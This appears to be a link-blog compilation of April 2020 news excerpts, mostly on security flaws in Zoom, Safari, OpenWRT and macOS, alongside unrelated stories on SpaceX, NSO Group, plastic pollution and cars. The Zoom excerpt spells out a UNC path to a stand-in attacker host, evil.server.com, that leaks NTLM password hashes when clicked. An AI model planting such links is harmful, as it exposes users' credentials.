Of course, people being dangerously shitty to each other is nothing new. Nor are online pranks. What makes Zoom bombing so wretched is that it’s happening at a time when millions of us are stuck inside with nowhere to go except, perhaps, into a video call with our friends and family, teachers, and support communities—our last tethers to the lives we used to have.

Source: Zoom Bombings Started Off as Pranks. Now Someone Could End Up Dead

NSO Group: Facebook tried to license our spyware to snoop on its own addicts – the same spyware it’s suing us over

NSO Group – sued by Facebook for developing Pegasus spyware that targeted WhatsApp users – this week claimed Facebook tried to license the very same surveillance software to snoop on its own social-media addicts.

The Israeli spyware maker’s CEO Shalev Hulio alleged in a statement [PDF] to a US federal district court that in 2017 he was approached by Facebook reps who wanted to use NSO’s Pegasus technology in Facebook’s controversial Onavo Protect app to track mobile users.

Pegasus is designed to, once installed on a device, harvest its text messages, gather information about its apps, eavesdrop on calls, track its location, and harvest passwords, among other things.

Onavo Protect, acquired by Facebook in 2013, was available for Android and iOS. It used VPN tunneling to wrap users’ internet connections in encryption, shielding their information as it traveled over untrusted and insecure Wi-Fi networks and the like. The iOS version also blocked harmful websites. However, the software blabbed telemetry about its users to Facebook as well as routed connections through Onavo servers, which could monitor people’s online activities. The application was forced out of the Apple iOS store in 2018 for siphoning information about other programs installed on devices, and discontinued in May 2019.

According to the NSO chief exec, Onavo Protect needed more surveillance powers on iOS handhelds, and so Facebook turned to the spyware maker for its technology.

“The Facebook representatives stated that Facebook was concerned that its method for gathering user data through Onavo Protect was less effective on Apple devices than on Android devices,” Hulio alleged.

“The Facebook representatives also stated that Facebook wanted to use purported capabilities of Pegasus to monitor users on Apple devices and were willing to pay for the ability to monitor Onavo Protect users.”

Because NSO only sells to governments and not private companies, Hulio claimed, he turned down the Facebook licensing offer.

Facebook, in a statement to The Register, characterized the allegations as a distraction from its legal battle against NSO, which kicked off in October 2019. The web giant claims NSO, working on behalf of its customers, illegally hacked targets via security vulnerabilities in Facebook-owned WhatsApp’s code to install Pegasus on devices.

“NSO is trying to distract from the facts Facebook and WhatsApp filed in court nearly six months ago. Their attempt to avoid responsibility includes inaccurate representations about both their spyware and a discussion with people who work at Facebook,” a Facebook spokesperson said.

“Our lawsuit describes how NSO is responsible for attacking over 100 human rights activists and journalists around the world. NSO CEO Shalev Hulio has admitted his company can attack devices without a user knowing and he can see who has been targeted with Pegasus. We look forward to proving our case against NSO in court and seeking accountability for their actions.”

The case has been unusual from the start, with Facebook filing suit after first deleting NSO workers’ personal Facebook accounts. The spyware maker then missed its scheduled court appearance because, it was alleged, Facebook did not properly serve its paperwork.

NSO reckons Facebook’s accusations are baseless because it only sells its software to government departments and agencies, and does not operate the tools itself. Thus, we’re told, it didn’t hack anyone itself, and it cannot be held accountable for the actions of its customers. NSO also noted it only deals with governments allowed under Israeli export laws.

Further, NSO contended the court, in Oakland, California, does not have jurisdiction to hear this case due to America’s Foreign Sovereign Immunity Act, and it argued that the actions described in the lawsuit wouldn’t even run afoul of its spyware’s terms of service

Source: NSO Group: Facebook tried to license our spyware to snoop on its own addicts – the same spyware it’s suing us over • The Register

SpaceX loses its third Starship prototype during a cryogenic test

This week, SpaceX workers in South Texas loaded the third full-scale Starship prototype—SN3—onto a test stand ​at the company’s Boca Chica launch site. On Wednesday night, they pressure-tested the vehicle at ambient temperature with nitrogen, and SN3 performed fine.

On Thursday night SpaceX began cryo-testing the vehicle, which means it was loaded again with nitrogen, but this time it was chilled to flight-like temperatures and put under flight-like pressures. Unfortunately, a little after 2am local time, SN3 failed and began to collapse on top of itself. It appeared as if the vehicle may have lost pressurization and become top-heavy.

Shortly after the failure, SpaceX’s founder and chief engineer, Elon Musk, said on Twitter, “We will see what data review says in the morning, but this may have been a test configuration mistake.” A testing issue would be good in the sense that it means the vehicle itself performed well, and the problem can be more easily addressed.

This is the third time a Starship has failed during these proof tests that precede engine tests and, potentially flight tests. Multiple sources indicated that had these preliminary tests succeeded, SN3 would have attempted a 150-meter flight test as early as next Tuesday.

Here’s a recap of SpaceX’s efforts to test full-size Starships to date:

  • Starship Mk1: Construction began in December, 2018. Failed during pressure test in November, 2019.
  • Starship SN1: Construction began in October, 2019. Failed during a pressure test on Feb. 28.
  • Starship SN2: Construction began in Feb., 2020. After SN1 failure, was converted into a test bed for thrust puck at base of rocket. Passed test on March 8, and was retired.
  • Starship SN3: Construction began in March, 2020. Cryogenic test failure on April 3.
  • Starship SN4: Construction began in March, 2020. Testing begins later this month?

This failure has to be a disappointment in that the prototype rocket failed for a third time before getting to Raptor engine tests. And after the SN1 failure, Musk said he told his engineers, “In the future, you treat that rocket like it’s your baby, and you do not send it to the test site unless you think your baby’s going to be OK.”

This baby was not OK.

Source: SpaceX loses its third Starship prototype during a cryogenic test | Ars Technica

A Hacker Found a Way to Take Over Any Apple Webcam

Apple patched the vulnerabilities in January and March updates. But before the fixes, all a victim would have needed to do is click one malicious link and an attacker would have been able to spy on them remotely.

“Safari encourages users to save their preferences for site permissions, like whether to trust Skype with microphone and camera access,” says Ryan Pickren, the security researcher who disclosed the vulnerabilities to Apple. “So what an attacker could do with this kill chain is make a malicious website that from Safari’s perspective could then turn into ‘Skype’. And then the malicious site will have all the permissions that you previously granted to Skype, which means an attacker could just start taking pictures of you or turn on your microphone or even screen-share.”

The bugs Pickren found all stem from seemingly minor oversights. For example, he discovered that Safari’s list of the permissions a user has granted to websites treated all sorts of URL variations as being part of the same site, like https://www.example.com, http://example.com, and fake://example.com. By “wiggling around,” as Pickren puts it, he was able to generate specially crafted URLs that could work with scripts embedded in a malicious site to launch the bait-and-switch that would trick Safari.

“I just kind of hammered the browser with really weird cases until Safari got confused and gave an origin that didn’t make sense,” he says. “And eventually the bugs could all kind of bounce from one to the next. Part of this is that some of the bugs were really, really old flaws in the WebKit core from years ago. They probably were not as dangerous as they are now just because the stars lined up on how an attacker would use them today.”

A hacker who tricked a victim into clicking their malicious link would be able to quietly launch the target’s webcam and microphone to capture video, take photos, or record audio. And the attack would work on iPhones, iPads, and Macs alike. None of the flaws are in Apple’s microphone and webcam protections themselves, or even in Safari’s defenses that keep malicious sites from accessing the sensors. Instead, the attack surmounts all of these barriers just by generating a convincing disguise.

Pickren submitted seven vulnerabilities to Apple’s bug bounty program in mid-December and says he got a response that the company had validated the bugs the next day. While an attacker would only exploit three of the bugs to take over webcams in the chain Pickren envisioned, he found other, related flaws along the way that he submitted as well. Pickren says that part of the reason he encountered so many extra bugs was that he was looking for an attack chain that would work on both iOS and macOS—and Safari is designed slightly differently for each.

Source: A Hacker Found a Way to Take Over Any Apple Webcam | WIRED

Pandemic Shutdowns Will Help the Economy, Too

A study by economists Sergio Correia, Stephan Luck and Emil Verner suggests that the best way to save your economy is to save your people. The authors looked at the economic impact of the Spanish influenza pandemic of 1918 on different U.S. cities. They concluded that the earlier, more forcefully and longer cities responded, the better their economic recovery.
A faculty affiliate from the Harvard Department of Economics writes in Bloomberg: [C]ities that implemented aggressive social distancing and shutdowns to contain the virus came out looking better. Implementing these policies eight days earlier, or maintaining them for 46 days longer were associated with 4% and 6% higher post-pandemic manufacturing employment, respectively. The gains for output were similar. Likewise, faster and longer-lasting distancing measures were associated with higher post-pandemic banking activity…

[T]his is at least consistent with the arguments my Bloomberg Opinion colleagues Noah Smith and Michael Strain have already put forward for why easing distancing measures too early would be potentially devastating for the economy… [I]t looks like the things we should be doing to save lives are also what we should be doing to save the economy.

Source: Pandemic Shutdowns Will Help the Economy, Too – Slashdot

Ex-NSA hacker drops new zero-day doom for Zoom

Zoom’s troubled year just got worse.

Now that a large portion of the world is working from home to ride out the coronavirus pandemic, Zoom’s popularity has rocketed, but also has led to an increased focus on the company’s security practices and privacy promises. Hot on the heels of two security researchers finding a Zoom bug that can be abused to steal Windows passwords, another security researcher found two new bugs that can be used to take over a Zoom user’s Mac, including tapping into the webcam and microphone.

Patrick Wardle, a former NSA hacker and now principal security researcher at Jamf, dropped the two previously undisclosed flaws on his blog Wednesday, which he shared with TechCrunch.

The two bugs, Wardle said, can be launched by a local attacker — that’s where someone has physical control of a vulnerable computer. Once exploited, the attacker can gain and maintain persistent access to the innards of a victim’s computer, allowing them to install malware or spyware.

Wardle’s first bug piggybacks off a previous finding. Zoom uses a “shady” technique — one that’s also used by Mac malware — to install the Mac app without user interaction. Wardle found that a local attacker with low-level user privileges can inject the Zoom installer with malicious code to obtain the highest level of user privileges, known as “root.”

Those root-level user privileges mean the attacker can access the underlying macOS operating system, which are typically off-limits to most users, making it easier to run malware or spyware without the user noticing.

The second bug exploits a flaw in how Zoom handles the webcam and microphone on Macs. Zoom, like any app that needs the webcam and microphone, first requires consent from the user. But Wardle said an attacker can inject malicious code into Zoom to trick it into giving the attacker the same access to the webcam and microphone that Zoom already has. Once Wardle tricked Zoom into loading his malicious code, the code will “automatically inherit” any or all of Zoom’s access rights, he said — and that includes Zoom’s access to the webcam and microphone.

“No additional prompts will be displayed, and the injected code was able to arbitrarily record audio and video,” wrote Wardle.

Because Wardle dropped detail of the vulnerabilities on his blog, Zoom has not yet provided a fix. Zoom also did not respond to TechCrunch’s request for comment.

In the meanwhile, Wardle said, “if you care about your security and privacy, perhaps stop using Zoom.”

Source: Ex-NSA hacker drops new zero-day doom for Zoom | TechCrunch

Zoom User Warning: This Is How Attackers Could Steal Windows Passwords

Today, news of a Zoom issue affecting Microsoft Windows users. The Zoom Windows client is at risk from a flaw in the chat feature that could allow attackers to steal the logins of people who click on a link, according to tech site Bleeping Computer.

When using Zoom, it’s possible for people to communicate with each other via text message in a chat interface. When a chat message is sent containing a URL, this is converted into a hyperlink that others can click on to open a webpage in their browser.

But the Zoom client apparently also turns Windows networking Universal Naming Convention (UNC) paths into a clickable link in the chat messages, security researcher @_g0dmode has found.

MORE FROM FORBESBeware Zoom Users: Here’s How People Can ‘Zoom-Bomb’ Your Chat

Ok, so what’s the problem?

Bleeping Computer demonstrated how regular URL and the UNC path of \\evil.server.com\images\cat.jpg were both converted into a clickable link in the chat message.

The problem with this is, according to Bleeping Computer: “When a user clicks on a UNC path link, Windows will attempt to connect to a remote site using the SMB file sharing protocol to open the remote cat.jpg file.”

And at the same time, by default, Windows sends a user’s login name and NTLM password hash. This can be cracked fairly easily by an attacker to reveal your password.

Security researcher Matthew Hickey posted an example of exploiting the Zoom Windows client using UNC path injection on Twitter.

Source: Zoom User Warning: This Is How Attackers Could Steal Windows Passwords

Zoom Users Beware: Here’s How A Flaw Allows Attackers To Take Over Your Mac Microphone And Webcam

Every day, a new Zoom security or privacy issue emerges. At least, that’s the way it seems during the COVID-19 crisis as an increasing number of people use the Zoom video conferencing app while working from home.

Soon after a security problem was disclosed that could allow attackers to steal Windows passwords, another researcher has identified two issues that can be used to take over a Zoom user’s Mac–and the microphone and webcam, according to TechCrunch.

The two bugs found by security researcher Patrick Wardle can be used by a local attacker able to gain physical control of a vulnerable Mac. By exploiting the bugs, the adversary can gain access to your computer and install malware or spyware, he wrote in a blog published today.

The first bug is based on another finding by @c1truz_, technical lead at a U.S. threat detection firm called VMRay. He said earlier this week on Twitter: “Ever wondered how the @zoom_us macOS installer does its job without you ever clicking install? Turns out they (ab)use preinstallation scripts, manually unpack the app using a bundled 7zip and install it to /Applications if the current user is in the admin group (no root needed).”

Source: Zoom Users Beware: Here’s How A Flaw Allows Attackers To Take Over Your Mac Microphone And Webcam

Report reveals ‘massive plastic pollution footprint’ of drinks firms

Four global drinks giants are responsible for more than half a million tonnes of plastic pollution in six developing countries each year, enough to cover 83 football pitches every day, according to a report.

The NGO Tearfund has calculated the greenhouse gas emissions from the open burning of plastic bottles, sachets and cartons produced by Coca-Cola, PepsiCo, Nestlé and Unilever in developing nations, where waste can be mismanaged because people do not have access to collections.

Taking a sample of six developing countries, reflecting a spread across the globe, the NGO estimated the burning of plastic packaging put on to the market by the companies creates 4.6m tonnes of carbon dioxide equivalent – equivalent to the emissions from 2m cars.

Tearfund analysed the plastic put on the market in China, India, the Philippines, Brazil, Mexico and Nigeria by the four companies to examine the impact of single use plastic in developing countries. The countries were chosen because they are large developing country markets, spread across three continents.

The sachets, bottles, and cartons sold in these countries often end up either being burned or dumped – creating a pollution problem equivalent to covering 83 football pitches with plastic to 10 centimetres deep each day.

The report says: “This massive plastic pollution footprint, while a crisis in and of itself, is also contributing to the climate crisis.”

It adds that the four companies make little or no mention of emissions from disposal of their products or packaging in their climate change commitments.

“These companies continue to sell billions of products in single-use bottles, sachets and packets in developing countries,” says the report.

“And they do this despite knowing that: waste isn’t properly managed in these contexts; their packaging therefore becomes pollution; and such pollution causes serious harm to the environment and people’s health. Such actions – with such knowledge – are morally indefensible.”

The charity is calling for the companies to urgently switch to refillable and reusable packaging instead of sachets and plastic bottles.

The NGO estimated how much of their plastic waste in each country is mismanaged, burned or dumped using World Bank data.

Source: Report reveals ‘massive plastic pollution footprint’ of drinks firms | Environment | The Guardian

Apple’s latest macOS Catalina update mysteriously borks SSH for some unlucky fans. What could be the cause?

Apple’s latest update to macOS Catalina appears to have broken SSH for some users.

Developer Tyler Hall published a blog post on Monday detailing the issue, but removed it after his writeup got noticed.

The issue is that under Apple’s macOS 10.15.4 update, released on March 24, trying to open a SSH connection to a port greater than 8192 using a server name, rather than an IP address, no longer works – for some users at least. SSH is a Swiss army knife that can be used to securely connect to remote machines to run commands, transfer files and other data, and so on.

The Register asked Hall to elaborate on his findings but he declined, citing the possibility that the problem might be particular to his set up rather than a bug in the software Apple shipped.

Hall demonstrated similar post-publication remorse this last October when he criticized the code quality of macOS Catalina, comparing it to Windows Vista. That sentiment is shared among many other macOS users (eg: “macOS 10.15 is chockablock with paper-cut bugs” – John Gruber). But the responses Hall received from friends within Apple led him to regret that post, too.

We asked Apple to comment but we’ve received no reply. Cupertino seldom addresses public criticism. Until June 2016, Apple even implied in its App Store Review Guidelines that it would look unfavorably on developers who complain publicly about rejected apps. Up to that point, its policy said, “If you run to the press and trash us, it never helps.”

The US government’s renewed antitrust scrutiny of companies like Amazon, Apple, Facebook, and Google in recent years has perhaps encouraged more caution in publicly declared tech platform policies.

The issue that Hall reported has been noted by others. A post two days ago on Apple’s discussion forum complains, “After that update I am no longer able to open a SSH connection to a port greater than 8192 using server name (instead of IP).” And three discussion participants claim they too have experienced the same issue.

One of these individuals, posting under the user name “webdeck,” filed a bug port in Open Radar, a public iOS and macOS bug reporting site created by developer Tim Burks because Apple hides its Radar bug reporting system from the public.

The bug report reads, “/usr/bin/ssh in macos 10.15.4 hangs if used with the -p flag to specify an alternate port and used with a hostname. This was not present in macOS 10.15.3.”

Source: Apple’s latest macOS Catalina update mysteriously borks SSH for some unlucky fans. What could be the cause? • The Register

OpenWRT code-execution bug found – update!

For almost three years, OpenWRT—the open source operating system that powers home routers and other types of embedded systems—has been vulnerable to remote code-execution attacks because updates were delivered over an unencrypted channel and digital signature verifications are easy to bypass, a researcher said.

OpenWRT has a loyal base of users who use the freely available package as an alternative to the firmware that comes installed on their devices. Besides routers, OpenWRT runs on smartphones, pocket computers and even laptops and desktop PCs. Users generally find OpenWRT to be a more secure choice because it offers advanced functions and its source code is easy to audit.

Security researcher Guido Vranken, however, recently found that updates and installation files were delivered over unencrypted HTTPs connections, which are open to attacks that allow adversaries to completely replace legitimate updates with malicious ones. The researcher also found that it was trivial for attackers with moderate experience to bypass digital-signature checks that verify a downloaded update as the legitimate one offered by OpenWTR maintainers. The combination of those two lapses makes it possible to send a malicious update that vulnerable devices will automatically install.

Exploits not for everyone

These code-execution exploits are limited in their scope because adversaries must either be in a position to conduct a man-in-the-middle attack or tamper with the DNS server that a device uses to find the update on the Internet. That means routers on a network that has no malicious users and using a legitimate DNS server are safe from attack. Vranken also speculates that packet spoofing or ARP cache poisoning may also make attacks possible, but he cautions that he didn’t test either method.

Source: OpenWRT code-execution bug puts millions of devices at risk | Ars Technica

Yes! Honda Follows Mazda By Ditching Some Touchscreen Controls For Not Being ‘Intuitive’

It seemed like a bit of a risk when Mazda decided to not offer a touchscreen in the new Mazda 3. But Mazda may have just been ahead of the trend, as Honda has also abandoned some reliance on the new Honda Jazz’s touch controls because they just aren’t “intuitive.”

Despite nearly a decade of dominating conversations about automotive design and not, for some reason, the risks of distracted driving, touchscreens are finally being seen for what they really are: annoying.

Honda’s decided the air conditioning controls on the new Honda Jazz, also known as the Honda Fit in the U.S. though we won’t get this new generation, are too good for a complicated, distracting touchscreen.

Here’s why, from Autocar:

Jazz project leader Takeki Tanaka explained: “The reason is quite simple – we wanted to minimise driver disruption for operation, in particular, for the heater and air conditioning.

“We changed it from touchscreen to dial operation, as we received customer feedback that it was difficult to operate intuitively. You had to look at the screen to change the heater seating, therefore, we changed it so one can operate it without looking, giving more confidence while driving.”

And here’s the part where anyone who has reviewed a car in the last decade goes and screams into their pillow with frustration, because that’s exactly the sort of feedback automakers have been getting from focus groups, customers and reviewers for about as long as these touchscreen systems have been in cars.

Touchscreens are worse than touch controls for one very obvious reason: A touchscreen requires two human senses—touch, obviously, and sight. But with enough experience, the genius of the human brain is capable of motor memory, so touch dials and buttons will eventually only require the memory of where it’s located and a finger to touch it. Eyes can stay on the road.

Honda did this earlier by bringing the volume knob back on the 2019 Civic.

The problem is people want cool technology in their cars. They want to feel like their hard-earned loan is going toward something nice and fancy and smarter than them. This is why some people like the Tesla tablet—they think its efficient to put literally thousands of functions all in one very distracting toy. That’s not very safe. It’s safer to put the toys away and just turn a knob to be more comfortable.

Simplicity is the greatest efficiency, and I’m pretty jazzed for a touchscreen-less future. It’s like music to my ears.

Source: Honda Follows Mazda By Ditching Some Touchscreen Controls For Not Being ‘Intuitive’

From 2019, after a deadly 2017 crash between a destroyer and an oil tanker: The US Navy will replace its touchscreen controls with mechanical ones on its destroyers

Ubisoft offers free games to encourage you to stay at home

Ubisoft thinks it has a simple way to encourage people to stay at home and wait out the COVID-19 pandemic: shower them with games. It’s running a month-long campaign that will give away free games, trials, discounts and other offers to give you something to do while you’re cooped up. It’s starting things off by offering the PC version of Rayman Legends for free on Uplay from now through April 3rd. It’s an old title, to be sure, but it might hit the spot if you’re looking for an upbeat game to remind you that things will get better.

Future offers will be available through Ubisoft’s Free Events site.

There’s no doubt that Ubi is using this partly as a promotional tool for its catalog. You might try a game you skipped the first time around, or might feel compelled to subscribe to Uplay+ to see more. At the same time, it might be particularly useful in some households. Not everyone has a backlog of games to burn through until lockdowns come to an end, let alone the money to buy more.

Source: Ubisoft offers free games to encourage you to stay at home | Engadget